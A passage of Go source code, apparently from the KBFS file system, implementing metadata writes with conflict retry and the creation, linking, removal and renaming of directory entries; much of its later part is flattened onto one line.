		ctime, stopAt, lbc)
	if err != nil {
		return path{}, DirEntry{}, nil, err
	}

	// Do the block changes need their own blocks? Unembed only if
	// this is the final call to this function with this MD.
	if stopAt == zeroPtr {
		bsplit := fbo.config.BlockSplitter()
		if !bsplit.ShouldEmbedBlockChanges(&md.data.Changes) {
			err = fbo.unembedBlockChanges(ctx, bps, md, &md.data.Changes,
				uid)
			if err != nil {
				return path{}, DirEntry{}, nil, err
			}
		}
	}

	return newPath, newDe, bps, nil
}

// Returns whether the given error is one that shouldn't block the
// removal of a file or directory.
//
// TODO: Consider other errors recoverable, e.g. ones that arise from
// present but corrupted blocks?
func isRecoverableBlockErrorForRemoval(err error) bool {
	// Currently identical to isRecoverableBlockError; kept separate
	// so removal-specific recoverable errors can be added later (see
	// the TODO above).
	return isRecoverableBlockError(err)
}

// isRetriableError returns true if err is one of the error types
// that an MD write should be retried on (exclusive-create conflict,
// unmerged self-conflict, or a recoverable block error), and the
// retry budget has not been exhausted.
func isRetriableError(err error, retries int) bool {
	_, isExclOnUnmergedError := err.(ExclOnUnmergedError)
	_, isUnmergedSelfConflictError := err.(UnmergedSelfConflictError)
	recoverable := isExclOnUnmergedError || isUnmergedSelfConflictError ||
		isRecoverableBlockError(err)
	return recoverable && retries < maxRetriesOnRecoverableErrors
}

// finalizeBlocks puts every brand-new block from bps into the
// transient block cache.
func (fbo *folderBranchOps) finalizeBlocks(bps *blockPutState) error {
	bcache := fbo.config.BlockCache()
	for _, blockState := range bps.blockStates {
		newPtr := blockState.blockPtr
		// only cache this block if we made a brand new block, not if
		// we just incref'd some other block.
		if !newPtr.IsFirstRef() {
			continue
		}
		if err := bcache.Put(newPtr, fbo.id(), blockState.block,
			TransientEntry); err != nil {
			return err
		}
	}
	return nil
}

// Returns true if the passed error indicates a revision conflict.
func isRevisionConflict(err error) bool {
	if err == nil {
		return false
	}
	_, isConflictRevision := err.(MDServerErrorConflictRevision)
	_, isConflictPrevRoot := err.(MDServerErrorConflictPrevRoot)
	_, isConflictDiskUsage := err.(MDServerErrorConflictDiskUsage)
	_, isConditionFailed := err.(MDServerErrorConditionFailed)
	_, isConflictFolderMapping := err.(MDServerErrorConflictFolderMapping)
	_, isJournal := err.(MDJournalConflictError)
	return isConflictRevision || isConflictPrevRoot ||
		isConflictDiskUsage || isConditionFailed ||
		isConflictFolderMapping || isJournal
}

// finalizeMDWriteLocked pushes md to the MD server -- as a merged
// revision when we're on the master branch, or as an unmerged
// revision after a conflict -- then caches the new blocks from bps,
// and sets md as the new head.  On an exclusive-create conflict it
// returns ExclOnUnmergedError instead of going unmerged, so the
// caller can catch up with the server and retry.  Must be called
// with mdWriterLock held.
func (fbo *folderBranchOps) finalizeMDWriteLocked(ctx context.Context,
	lState *lockState, md *RootMetadata, bps *blockPutState, excl Excl) (err error) {
	fbo.mdWriterLock.AssertLocked(lState)

	// finally, write out the new metadata
	mdops := fbo.config.MDOps()

	doUnmergedPut := true
	mergedRev := MetadataRevisionUninitialized

	// Remembered so we can detect below whether the Put rebased us
	// onto a different previous revision.
	oldPrevRoot := md.PrevRoot()

	var mdID MdID

	// This puts on a delay on any cancellations arriving to ctx. It is intended
	// to work sort of like a critical section, except that there isn't an
	// explicit call to exit the critical section. The cancellation, if any, is
	// triggered after a timeout (i.e.
	// fbo.config.DelayedCancellationGracePeriod()).
	//
	// The purpose of trying to avoid cancellation once we start MD write is to
	// avoid having an unpredictable perceived MD state. That is, when
	// runUnlessCanceled returns Canceled on cancellation, application receives
	// an EINTR, and would assume the operation didn't succeed. But the MD write
	// continues, and there's a chance the write will succeed, meaning the
	// operation succeeds. This contradicts with the application's perception
	// through error code and can lead to horrible situations. An easily caught
	// situation is when application calls Create with O_EXCL set, gets an EINTR
	// while MD write succeeds, retries and gets an EEXIST error. If users hit
	// Ctrl-C, this might not be a big deal. However, it also happens for other
	// interrupts.  For applications that use signals to communicate, e.g.
	// SIGALRM and SIGUSR1, this can happen pretty often, which renders broken.
	if err = EnableDelayedCancellationWithGracePeriod(
		ctx, fbo.config.DelayedCancellationGracePeriod()); err != nil {
		return err
	}
	// we don't explicitly clean up (by using a defer) CancellationDelayer here
	// because sometimes fuse makes another call using the same ctx.  For example, in
	// fuse's Create call handler, a dir.Create is followed by an Attr call. If
	// we do a deferred cleanup here, if an interrupt has been received, it can
	// cause ctx to be canceled before Attr call finishes, which causes FUSE to
	// return EINTR for the Create request. But at this point, the request may
	// have already succeeded. Returning EINTR makes application thinks the file
	// is not created successfully.

	if fbo.isMasterBranchLocked(lState) {
		// only do a normal Put if we're not already staged.
		mdID, err = mdops.Put(ctx, md)
		if doUnmergedPut = isRevisionConflict(err); doUnmergedPut {
			fbo.log.CDebugf(ctx, "Conflict: %v", err)
			mergedRev = md.Revision()

			if excl == WithExcl {
				// If this was caused by an exclusive create, we shouldn't do an
				// UnmergedPut, but rather try to get newest update from server, and
				// retry afterwards.
				err = fbo.getAndApplyMDUpdates(ctx, lState, fbo.applyMDUpdatesLocked)
				if err != nil {
					return err
				}
				return ExclOnUnmergedError{}
			}
		} else if err != nil {
			return err
		}
	} else if excl == WithExcl {
		// Exclusive creates are never valid while staged/unmerged.
		return ExclOnUnmergedError{}
	}

	if doUnmergedPut {
		// We're out of date, and this is not an exclusive write, so put it as an
		// unmerged MD.
		mdID, err = mdops.PutUnmerged(ctx, md)
		if isRevisionConflict(err) {
			// Self-conflicts are retried in `doMDWriteWithRetry`.
			err = UnmergedSelfConflictError{err}
		}
		if err != nil {
			return err
		}
		// We're now on an unmerged branch; kick off conflict
		// resolution against the merged revision we conflicted with.
		bid := md.BID()
		fbo.setBranchIDLocked(lState, bid)
		fbo.cr.Resolve(md.Revision(), mergedRev)
	} else {
		fbo.setBranchIDLocked(lState, NullBranchID)

		if md.IsRekeySet() && !md.IsWriterMetadataCopiedSet() {
			// Queue this folder for rekey if the bit was set and it's not a copy.
			// This is for the case where we're coming out of conflict resolution.
			// So why don't we do this in finalizeResolution? Well, we do but we don't
			// want to block on a rekey so we queue it. Because of that it may fail
			// due to a conflict with some subsequent write. By also handling it here
			// we'll always retry if we notice we haven't been successful in clearing
			// the bit yet. Note that I haven't actually seen this happen but it seems
			// theoretically possible.
			defer fbo.config.RekeyQueue().Enqueue(md.TlfID())
		}
	}

	md.swapCachedBlockChanges()

	err = fbo.finalizeBlocks(bps)
	if err != nil {
		return err
	}

	// If the server rebased us onto a different previous revision,
	// treat it like a new branch and resolve.
	rebased := (oldPrevRoot != md.PrevRoot())
	if rebased {
		bid := md.BID()
		fbo.setBranchIDLocked(lState, bid)
		fbo.cr.Resolve(md.Revision(), MetadataRevisionUninitialized)
	}

	fbo.headLock.Lock(lState)
	defer fbo.headLock.Unlock(lState)
	irmd := MakeImmutableRootMetadata(md, mdID, fbo.config.Clock().Now())
	err = fbo.setHeadSuccessorLocked(ctx, lState, irmd, rebased)
	if err != nil {
		return err
	}

	// Archive the old, unref'd blocks if journaling is off.
	if !TLFJournalEnabled(fbo.config, fbo.id()) {
		fbo.fbm.archiveUnrefBlocks(irmd.ReadOnly())
	}

	fbo.notifyBatchLocked(ctx, lState, irmd)
	return nil
}

// finalizeMDRekeyWriteLocked pushes a rekey MD revision to the
// server and sets it as the new head.  On a revision conflict it
// re-queues the folder for rekey and returns RekeyConflictError.
// Must be called with mdWriterLock held.
func (fbo *folderBranchOps) finalizeMDRekeyWriteLocked(ctx context.Context,
	lState *lockState, md *RootMetadata) (err error) {
	fbo.mdWriterLock.AssertLocked(lState)

	oldPrevRoot := md.PrevRoot()

	// finally, write out the new metadata
	mdID, err := fbo.config.MDOps().Put(ctx, md)
	isConflict := isRevisionConflict(err)
	if err != nil && !isConflict {
		return err
	}
	if isConflict {
		// drop this block. we've probably collided with someone also
		// trying to rekey the same folder but that's not necessarily
		// the case. we'll queue another rekey just in case. it should
		// be safe as it's idempotent. we don't want any rekeys present
		// in unmerged history or that will just make a mess.
		fbo.config.RekeyQueue().Enqueue(md.TlfID())
		return RekeyConflictError{err}
	}

	fbo.setBranchIDLocked(lState, NullBranchID)

	// A changed PrevRoot means the server rebased this revision.
	rebased := (oldPrevRoot != md.PrevRoot())
	if rebased {
		bid := md.BID()
		fbo.setBranchIDLocked(lState, bid)
		fbo.cr.Resolve(md.Revision(), MetadataRevisionUninitialized)
	}

	md.swapCachedBlockChanges()

	fbo.headLock.Lock(lState)
	defer fbo.headLock.Unlock(lState)
	return fbo.setHeadSuccessorLocked(ctx, lState,
		MakeImmutableRootMetadata(md, mdID, fbo.config.Clock().Now()), rebased)
}

// finalizeGCOp writes the given garbage-collection op in a new
// merged MD revision and sets it as the new head.  It takes
// mdWriterLock itself, and refuses to run while unmerged.
func (fbo *folderBranchOps) finalizeGCOp(ctx context.Context, gco *gcOp) (
	err error) {
	lState := makeFBOLockState()
	// Lock the folder so we can get an internally-consistent MD
	// revision number.
	fbo.mdWriterLock.Lock(lState)
	defer fbo.mdWriterLock.Unlock(lState)

	md, err := fbo.getMDForWriteLocked(ctx, lState)
	if err != nil {
		return err
	}

	if md.MergedStatus() == Unmerged {
		return UnexpectedUnmergedPutError{}
	}

	md.AddOp(gco)

	if err := fbo.maybeUnembedAndPutOneBlock(ctx, md); err != nil {
		return err
	}

	oldPrevRoot := md.PrevRoot()

	// finally, write out the new metadata
	mdID, err := fbo.config.MDOps().Put(ctx, md)
	if err != nil {
		// Don't allow garbage collection to put us into a conflicting
		// state; just wait for the next period.
		return err
	}

	fbo.setBranchIDLocked(lState, NullBranchID)
	md.swapCachedBlockChanges()

	// A changed PrevRoot means the server rebased this revision.
	rebased := (oldPrevRoot != md.PrevRoot())
	if rebased {
		bid := md.BID()
		fbo.setBranchIDLocked(lState, bid)
		fbo.cr.Resolve(md.Revision(), MetadataRevisionUninitialized)
	}

	fbo.headLock.Lock(lState)
	defer fbo.headLock.Unlock(lState)
	irmd := MakeImmutableRootMetadata(md, mdID, fbo.config.Clock().Now())
	err = fbo.setHeadSuccessorLocked(ctx, lState, irmd, rebased)
	if err != nil {
		return err
	}

	fbo.notifyBatchLocked(ctx, lState, irmd)
	return nil
}

// syncBlockAndFinalizeLocked syncs newBlock up to the root, puts all
// resulting dirty blocks to the block server, and finalizes the MD
// write; on failure, the newly-put block state is cleaned up.  Must
// be called with mdWriterLock held.
//
// NOTE(review): the stopAt parameter appears unused here -- the sync
// below is always called with zeroPtr; confirm whether that is
// intentional.
func (fbo *folderBranchOps) syncBlockAndFinalizeLocked(ctx context.Context,
	lState *lockState, md *RootMetadata, newBlock Block, dir path,
	name string, entryType EntryType, mtime bool, ctime bool,
	stopAt BlockPointer, excl Excl) (de DirEntry, err error) {
	fbo.mdWriterLock.AssertLocked(lState)
	_, de, bps, err := fbo.syncBlockAndCheckEmbedLocked(
		ctx, lState, md, newBlock, dir, name, entryType, mtime,
		ctime, zeroPtr, nil)
	if err != nil {
		return DirEntry{}, err
	}

	// If anything below fails, don't leak the blocks we already put.
	defer func() {
		if err != nil {
			fbo.fbm.cleanUpBlockState(
				md.ReadOnly(), bps, blockDeleteOnMDFail)
		}
	}()

	_, err = doBlockPuts(ctx, fbo.config.BlockServer(),
		fbo.config.BlockCache(), fbo.config.Reporter(), fbo.log, md.TlfID(),
		md.GetTlfHandle().GetCanonicalName(), *bps)
	if err != nil {
		return DirEntry{}, err
	}

	err = fbo.finalizeMDWriteLocked(ctx, lState, md, bps, excl)
	if err != nil {
		return DirEntry{}, err
	}
	return de, nil
}

// checkDisallowedPrefixes returns DisallowedPrefixError if name
// starts with any reserved prefix.
func checkDisallowedPrefixes(name string) error {
	for _, prefix := range disallowedPrefixes {
		if strings.HasPrefix(name, prefix) {
			return DisallowedPrefixError{name, prefix}
		}
	}
	return nil
}

// checkNewDirSize returns DirTooBigError if adding an entry named
// newName to the directory at dirPath would push the directory past
// the configured MaxDirBytes.
func (fbo *folderBranchOps) checkNewDirSize(ctx context.Context,
	lState *lockState, md ReadOnlyRootMetadata,
	dirPath path, newName string) error {
	// Check that the directory isn't past capacity already.
	var currSize uint64
	if dirPath.hasValidParent() {
		de, err := fbo.blocks.GetDirtyEntry(ctx, lState, md, dirPath)
		if err != nil {
			return err
		}
		currSize = de.Size
	} else {
		// dirPath is just the root.
		currSize = md.data.Dir.Size
	}
	// Just an approximation since it doesn't include the size of the
	// directory entry itself, but that's ok -- at worst it'll be an
	// off-by-one-entry error, and since there's a maximum name length
	// we can't get in too much trouble.
	if currSize+uint64(len(newName)) > fbo.config.MaxDirBytes() {
		return DirTooBigError{dirPath, currSize + uint64(len(newName)),
			fbo.config.MaxDirBytes()}
	}
	return nil
}

// PathType returns the path type (public or private) of this folder.
func (fbo *folderBranchOps) PathType() PathType {
	if fbo.folderBranch.Tlf.IsPublic() {
		return PublicPathType
	}
	return PrivatePathType
}

// canonicalPath returns full canonical path for dir node and name.
func (fbo *folderBranchOps) canonicalPath(ctx context.Context, dir Node, name string) (string, error) {
	dirPath, err := fbo.pathFromNodeForRead(dir)
	if err != nil {
		return "", err
	}
	return BuildCanonicalPath(fbo.PathType(), dirPath.String(), name), nil
}

// entryType must not be Sym.
func (fbo *folderBranchOps) createEntryLocked( ctx context.Context, lState *lockState, dir Node, name string, entryType EntryType, excl Excl) (Node, DirEntry, error) { fbo.mdWriterLock.AssertLocked(lState) if err := checkDisallowedPrefixes(name); err != nil { return nil, DirEntry{}, err } if uint32(len(name)) > fbo.config.MaxNameBytes() { return nil, DirEntry{}, NameTooLongError{name, fbo.config.MaxNameBytes()} } if excl == WithExcl { if err := WaitForTLFJournal(ctx, fbo.config, fbo.id(), fbo.log); err != nil { return nil, DirEntry{}, err } } filename, err := fbo.canonicalPath(ctx, dir, name) if err != nil { return nil, DirEntry{}, err } // verify we have permission to write md, err := fbo.getMDForWriteLockedForFilename(ctx, lState, filename) if err != nil { return nil, DirEntry{}, err } dirPath, err := fbo.pathFromNodeForMDWriteLocked(lState, dir) if err != nil { return nil, DirEntry{}, err } dblock, err := fbo.blocks.GetDir( ctx, lState, md.ReadOnly(), dirPath, blockWrite) if err != nil { return nil, DirEntry{}, err } // does name already exist? if _, ok := dblock.Children[name]; ok { return nil, DirEntry{}, NameExistsError{name} } if err := fbo.checkNewDirSize( ctx, lState, md.ReadOnly(), dirPath, name); err != nil { return nil, DirEntry{}, err } co, err := newCreateOp(name, dirPath.tailPointer(), entryType) if err != nil { return nil, DirEntry{}, err } md.AddOp(co) // create new data block var newBlock Block // XXX: for now, put a unique ID in every new block, to make sure it // has a unique block ID. This may not be needed once we have encryption. if entryType == Dir { newBlock = &DirBlock{ Children: make(map[string]DirEntry), } } else { newBlock = &FileBlock{} } // Passthrough journal writes temporarily. if excl == WithExcl { if jServer, err := GetJournalServer(fbo.config); err == nil { // Repeatedly flush and try to disable the journal. 
Since // we hold the write lock, this shouldn't take more than // one attempt very often (but could happen since block // archives and removals don't take the write lock). // TODO: this opens us up to timeout issues; perhaps // investigate how we can re-order file system operations // easily without compromising semantics too much (i.e., // to jump this operation to the front of the journal). wasEnabled := false for i := 0; i < 20; i++ { err = WaitForTLFJournal(ctx, fbo.config, fbo.id(), fbo.log) if err != nil { return nil, DirEntry{}, err } wasEnabled, err = jServer.Disable(ctx, fbo.id()) if err == nil { // TODO: there is a theoretical race here if a // user re-enables the journal directly via the // JournalServer through a file system interface. // Maybe we should create a way to lock down // enables except for the goroutine that called // Disable (using a channel or function returned // from Disable, for example). break } fbo.log.CDebugf(ctx, "Trying again after error "+ "disabling journal: %v", err) } if err != nil { fbo.log.CDebugf(ctx, "Couldn't disable journal: %v", err) return nil, DirEntry{}, err } if wasEnabled { defer func() { // TODO: check whether it had been paused when we // disabled it, so we can start it without // background work enabled? 
if err := jServer.Enable(ctx, fbo.id(), TLFJournalBackgroundWorkEnabled); err != nil { fbo.log.CDebugf(ctx, "Couldn't re-enable journal: %v", err) } }() } } } de, err := fbo.syncBlockAndFinalizeLocked( ctx, lState, md, newBlock, dirPath, name, entryType, true, true, zeroPtr, excl) if err != nil { return nil, DirEntry{}, err } node, err := fbo.nodeCache.GetOrCreate(de.BlockPointer, name, dir) if err != nil { return nil, DirEntry{}, err } return node, de, nil } func (fbo *folderBranchOps) doMDWriteWithRetry(ctx context.Context, lState *lockState, fn func(lState *lockState) error) error { doUnlock := false defer func() { if doUnlock { fbo.mdWriterLock.Unlock(lState) } }() for i := 0; ; i++ { fbo.mdWriterLock.Lock(lState) doUnlock = true // Make sure we haven't been canceled before doing anything // too serious. select { case <-ctx.Done(): return ctx.Err() default: } err := fn(lState) if isRetriableError(err, i) { fbo.log.CDebugf(ctx, "Trying again after retriable error: %v", err) // Release the lock to give someone else a chance doUnlock = false fbo.mdWriterLock.Unlock(lState) if _, ok := err.(ExclOnUnmergedError); ok { if err = fbo.cr.Wait(ctx); err != nil { return err } } else if _, ok := err.(UnmergedSelfConflictError); ok { // We can only get here if we are already on an // unmerged branch and an errored PutUnmerged did make // it to the mdserver. Let's force sync, with a fresh // context so the observer doesn't ignore the updates // (but tie the cancels together). 
newCtx := fbo.ctxWithFBOID(context.Background()) newCtx, cancel := context.WithCancel(newCtx) defer cancel() go func() { select { case <-ctx.Done(): cancel() case <-newCtx.Done(): } }() fbo.log.CDebugf(ctx, "Got a revision conflict while unmerged "+ "(%v); forcing a sync", err) err = fbo.getAndApplyNewestUnmergedHead(newCtx, lState) if err != nil { return err } cancel() } continue } else if err != nil { return err } return nil } } func (fbo *folderBranchOps) doMDWriteWithRetryUnlessCanceled( ctx context.Context, fn func(lState *lockState) error) error { return runUnlessCanceled(ctx, func() error { lState := makeFBOLockState() return fbo.doMDWriteWithRetry(ctx, lState, fn) }) } func (fbo *folderBranchOps) CreateDir( ctx context.Context, dir Node, path string) ( n Node, ei EntryInfo, err error) { fbo.log.CDebugf(ctx, "CreateDir %p %s", dir.GetID(), path) defer func() { if err != nil { fbo.deferLog.CDebugf(ctx, "Error: %v", err) } else { fbo.deferLog.CDebugf(ctx, "Done: %p", n.GetID()) } }() err = fbo.checkNode(dir) if err != nil { return nil, EntryInfo{}, err } var retNode Node var retEntryInfo EntryInfo err = fbo.doMDWriteWithRetryUnlessCanceled(ctx, func(lState *lockState) error { node, de, err := fbo.createEntryLocked(ctx, lState, dir, path, Dir, NoExcl) // Don't set node and ei directly, as that can cause a // race when the Create is canceled. 
retNode = node retEntryInfo = de.EntryInfo return err }) if err != nil { return nil, EntryInfo{}, err } return retNode, retEntryInfo, nil } func (fbo *folderBranchOps) CreateFile( ctx context.Context, dir Node, path string, isExec bool, excl Excl) ( n Node, ei EntryInfo, err error) { fbo.log.CDebugf(ctx, "CreateFile %p %s isExec=%v Excl=%s", dir.GetID(), path, isExec, excl) defer func() { if err != nil { fbo.deferLog.CDebugf(ctx, "Error: %v", err) } else { fbo.deferLog.CDebugf(ctx, "Done: %p", n.GetID()) } }() err = fbo.checkNode(dir) if err != nil { return nil, EntryInfo{}, err } var entryType EntryType if isExec { entryType = Exec } else { entryType = File } if excl == WithExcl { if err = fbo.cr.Wait(ctx); err != nil { return nil, EntryInfo{}, err } } var retNode Node var retEntryInfo EntryInfo err = fbo.doMDWriteWithRetryUnlessCanceled(ctx, func(lState *lockState) error { // Don't set node and ei directly, as that can cause a // race when the Create is canceled. node, de, err := fbo.createEntryLocked(ctx, lState, dir, path, entryType, excl) retNode = node retEntryInfo = de.EntryInfo return err }) if err != nil { return nil, EntryInfo{}, err } return retNode, retEntryInfo, nil } func (fbo *folderBranchOps) createLinkLocked( ctx context.Context, lState *lockState, dir Node, fromName string, toPath string) (DirEntry, error) { fbo.mdWriterLock.AssertLocked(lState) if err := checkDisallowedPrefixes(fromName); err != nil { return DirEntry{}, err } if uint32(len(fromName)) > fbo.config.MaxNameBytes() { return DirEntry{}, NameTooLongError{fromName, fbo.config.MaxNameBytes()} } // verify we have permission to write md, err := fbo.getMDForWriteLocked(ctx, lState) if err != nil { return DirEntry{}, err } dirPath, err := fbo.pathFromNodeForMDWriteLocked(lState, dir) if err != nil { return DirEntry{}, err } dblock, err := fbo.blocks.GetDir( ctx, lState, md.ReadOnly(), dirPath, blockWrite) if err != nil { return DirEntry{}, err } // TODO: validate inputs // does name already 
exist? if _, ok := dblock.Children[fromName]; ok { return DirEntry{}, NameExistsError{fromName} } if err := fbo.checkNewDirSize(ctx, lState, md.ReadOnly(), dirPath, fromName); err != nil { return DirEntry{}, err } co, err := newCreateOp(fromName, dirPath.tailPointer(), Sym) if err != nil { return DirEntry{}, err } md.AddOp(co) // Create a direntry for the link, and then sync now := fbo.nowUnixNano() dblock.Children[fromName] = DirEntry{ EntryInfo: EntryInfo{ Type: Sym, Size: uint64(len(toPath)), SymPath: toPath, Mtime: now, Ctime: now, }, } _, err = fbo.syncBlockAndFinalizeLocked( ctx, lState, md, dblock, *dirPath.parentPath(), dirPath.tailName(), Dir, true, true, zeroPtr, NoExcl) if err != nil { return DirEntry{}, err } return dblock.Children[fromName], nil } func (fbo *folderBranchOps) CreateLink( ctx context.Context, dir Node, fromName string, toPath string) ( ei EntryInfo, err error) { fbo.log.CDebugf(ctx, "CreateLink %p %s -> %s", dir.GetID(), fromName, toPath) defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() err = fbo.checkNode(dir) if err != nil { return EntryInfo{}, err } var retEntryInfo EntryInfo err = fbo.doMDWriteWithRetryUnlessCanceled(ctx, func(lState *lockState) error { // Don't set ei directly, as that can cause a race when // the Create is canceled. de, err := fbo.createLinkLocked(ctx, lState, dir, fromName, toPath) retEntryInfo = de.EntryInfo return err }) if err != nil { return EntryInfo{}, err } return retEntryInfo, nil } // unrefEntry modifies md to unreference all relevant blocks for the // given entry. func (fbo *folderBranchOps) unrefEntry(ctx context.Context, lState *lockState, md *RootMetadata, dir path, de DirEntry, name string) error { md.AddUnrefBlock(de.BlockInfo) // construct a path for the child so we can unlink with it. childPath := dir.ChildPath(name, de.BlockPointer) // If this is an indirect block, we need to delete all of its // children as well. 
NOTE: non-empty directories can't be // removed, so no need to check for indirect directory blocks // here. if de.Type == File || de.Type == Exec { blockInfos, err := fbo.blocks.GetIndirectFileBlockInfos( ctx, lState, md.ReadOnly(), childPath) if isRecoverableBlockErrorForRemoval(err) { msg := fmt.Sprintf("Recoverable block error encountered for unrefEntry(%v); continuing", childPath) fbo.log.CWarningf(ctx, "%s", msg) fbo.log.CDebugf(ctx, "%s (err=%v)", msg, err) } else if err != nil { return err } for _, blockInfo := range blockInfos { md.AddUnrefBlock(blockInfo) } } return nil } func (fbo *folderBranchOps) removeEntryLocked(ctx context.Context, lState *lockState, md *RootMetadata, dir path, name string) error { fbo.mdWriterLock.AssertLocked(lState) pblock, err := fbo.blocks.GetDir( ctx, lState, md.ReadOnly(), dir, blockWrite) if err != nil { return err } // make sure the entry exists de, ok := pblock.Children[name] if !ok { return NoSuchNameError{name} } ro, err := newRmOp(name, dir.tailPointer()) if err != nil { return err } md.AddOp(ro) err = fbo.unrefEntry(ctx, lState, md, dir, de, name) if err != nil { return err } // the actual unlink delete(pblock.Children, name) // sync the parent directory _, err = fbo.syncBlockAndFinalizeLocked( ctx, lState, md, pblock, *dir.parentPath(), dir.tailName(), Dir, true, true, zeroPtr, NoExcl) if err != nil { return err } return nil } func (fbo *folderBranchOps) removeDirLocked(ctx context.Context, lState *lockState, dir Node, dirName string) (err error) { fbo.mdWriterLock.AssertLocked(lState) // verify we have permission to write md, err := fbo.getMDForWriteLocked(ctx, lState) if err != nil { return err } dirPath, err := fbo.pathFromNodeForMDWriteLocked(lState, dir) if err != nil { return err } pblock, err := fbo.blocks.GetDir( ctx, lState, md.ReadOnly(), dirPath, blockRead) de, ok := pblock.Children[dirName] if !ok { return NoSuchNameError{dirName} } // construct a path for the child so we can check for an empty dir 
childPath := dirPath.ChildPath(dirName, de.BlockPointer) childBlock, err := fbo.blocks.GetDir( ctx, lState, md.ReadOnly(), childPath, blockRead) if isRecoverableBlockErrorForRemoval(err) { msg := fmt.Sprintf("Recoverable block error encountered for removeDirLocked(%v); continuing", childPath) fbo.log.CWarningf(ctx, "%s", msg) fbo.log.CDebugf(ctx, "%s (err=%v)", msg, err) } else if err != nil { return err } else if len(childBlock.Children) > 0 { return DirNotEmptyError{dirName} } return fbo.removeEntryLocked(ctx, lState, md, dirPath, dirName) } func (fbo *folderBranchOps) RemoveDir( ctx context.Context, dir Node, dirName string) (err error) { fbo.log.CDebugf(ctx, "RemoveDir %p %s", dir.GetID(), dirName) defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() err = fbo.checkNode(dir) if err != nil { return } return fbo.doMDWriteWithRetryUnlessCanceled(ctx, func(lState *lockState) error { return fbo.removeDirLocked(ctx, lState, dir, dirName) }) } func (fbo *folderBranchOps) RemoveEntry(ctx context.Context, dir Node, name string) (err error) { fbo.log.CDebugf(ctx, "RemoveEntry %p %s", dir.GetID(), name) defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() err = fbo.checkNode(dir) if err != nil { return err } return fbo.doMDWriteWithRetryUnlessCanceled(ctx, func(lState *lockState) error { // verify we have permission to write md, err := fbo.getMDForWriteLocked(ctx, lState) if err != nil { return err } dirPath, err := fbo.pathFromNodeForMDWriteLocked(lState, dir) if err != nil { return err } return fbo.removeEntryLocked(ctx, lState, md, dirPath, name) }) } func (fbo *folderBranchOps) renameLocked( ctx context.Context, lState *lockState, oldParent path, oldName string, newParent path, newName string) (err error) { fbo.mdWriterLock.AssertLocked(lState) // verify we have permission to write md, err := fbo.getMDForWriteLocked(ctx, lState) if err != nil { return err } oldPBlock, newPBlock, newDe, lbc, err := fbo.blocks.PrepRename( ctx, lState, md, oldParent, 
oldName, newParent, newName) if err != nil { return err } // does name exist? if de, ok := newPBlock.Children[newName]; ok { // Usually higher-level programs check these, but just in case. if de.Type == Dir && newDe.Type != Dir { return NotDirError{newParent.ChildPathNoPtr(newName)} } else if de.Type != Dir && newDe.Type == Dir { return NotFileError{newParent.ChildPathNoPtr(newName)} } if de.Type == Dir { // The directory must be empty. oldTargetDir, err := fbo.blocks.GetDirBlockForReading(ctx, lState, md.ReadOnly(), de.BlockPointer, newParent.Branch, newParent.ChildPathNoPtr(newName)) if err != nil { return err } if len(oldTargetDir.Children) != 0 { fbo.log.CWarningf(ctx, "Renaming over a non-empty directory "+ " (%s/%s) not allowed.", newParent, newName) return DirNotEmptyError{newName} } } // Delete the old block pointed to by this direntry. err := fbo.unrefEntry(ctx, lState, md, newParent, de, newName) if err != nil { return err } } // only the ctime changes newDe.Ctime = fbo.nowUnixNano() newPBlock.Children[newName] = newDe delete(oldPBlock.Children, oldName) // find the common ancestor var i int found := false // the root block will always be the same, so start at number 1 for i = 1; i < len(oldParent.path) && i < len(newParent.path); i++ { if oldParent.path[i].ID != newParent.path[i].ID { found = true i-- break } } if !found { // if we couldn't find one, then the common ancestor is the // last node in the shorter path if len(oldParent.path) < len(newParent.path) { i = len(oldParent.path) - 1 } else { i = len(newParent.path) - 1 } } commonAncestor := oldParent.path[i].BlockPointer oldIsCommon := oldParent.tailPointer() == commonAncestor newIsCommon := newParent.tailPointer() == commonAncestor newOldPath := path{FolderBranch: oldParent.FolderBranch} var oldBps *blockPutState if oldIsCommon { if newIsCommon { // if old and new are both the common ancestor, there is // nothing to do (syncBlock will take care of everything) } else { // If the old one is common 
and the new one is // not, then the last // syncBlockAndCheckEmbedLocked call will need // to access the old one. lbc[oldParent.tailPointer()] = oldPBlock } } else { if newIsCommon { // If the new one is common, then the first // syncBlockAndCheckEmbedLocked call will need to access // it. lbc[newParent.tailPointer()] = newPBlock } // The old one is not the common ancestor, so we need to sync it. // TODO: optimize by pushing blocks from both paths in parallel newOldPath, _, oldBps, err = fbo.syncBlockAndCheckEmbedLocked( ctx, lState, md, oldPBlock, *oldParent.parentPath(), oldParent.tailName(), Dir, true, true, commonAncestor, lbc) if err != nil { return err } } newNewPath, _, newBps, err := fbo.syncBlockAndCheckEmbedLocked( ctx, lState, md, newPBlock, *newParent.parentPath(), newParent.tailName(), Dir, true, true, zeroPtr, lbc) if err != nil { return err } // newOldPath is really just a prefix now. A copy is necessary as an // append could cause the new path to contain nodes from the old path. newOldPath.path = append(make([]pathNode, i+1, i+1), newOldPath.path...) 
copy(newOldPath.path[:i+1], newNewPath.path[:i+1]) // merge and finalize the blockPutStates if oldBps != nil { newBps.mergeOtherBps(oldBps) } defer func() { if err != nil { fbo.fbm.cleanUpBlockState( md.ReadOnly(), newBps, blockDeleteOnMDFail) } }() _, err = doBlockPuts(ctx, fbo.config.BlockServer(), fbo.config.BlockCache(), fbo.config.Reporter(), fbo.log, md.TlfID(), md.GetTlfHandle().GetCanonicalName(), *newBps) if err != nil { return err } return fbo.finalizeMDWriteLocked(ctx, lState, md, newBps, NoExcl) } func (fbo *folderBranchOps) Rename( ctx context.Context, oldParent Node, oldName string, newParent Node, newName string) (err error) { fbo.log.CDebugf(ctx, "Rename %p/%s -> %p/%s", oldParent.GetID(), oldName, newParent.GetID(), newName) defer func() { fbo.deferLog.CDebugf(ctx, "Done: %v", err) }() err = fbo.checkNode(newParent) if err != nil { return err } return fbo.doMDWriteWithRetryUnlessCanceled(ctx, func(lState *lockState) error { oldParentPath, err := fbo.pathFromNodeForMDWriteLocked(lState, oldParent) if err != nil { return err } newParentPath, err := fbo.pathFromNodeForMDWriteLocked(lState, newParent) if err != nil { return err } // only works for paths within the same topdir if oldParentPath.FolderBranch != newParentPath.FolderBranch { return RenameAcrossDirsError{} } return fbo.renameLocked(ctx, lState, oldParentPath, oldName, newParentPath, newName) }) } func (fbo *folderBranchOps) Read( ctx context.Context, file Node, dest []byte, off int64) ( n int64, err error) { fbo.log.CDebugf(ctx, "Read %p %d %d", file.GetID(), len(dest), off) defer func() { 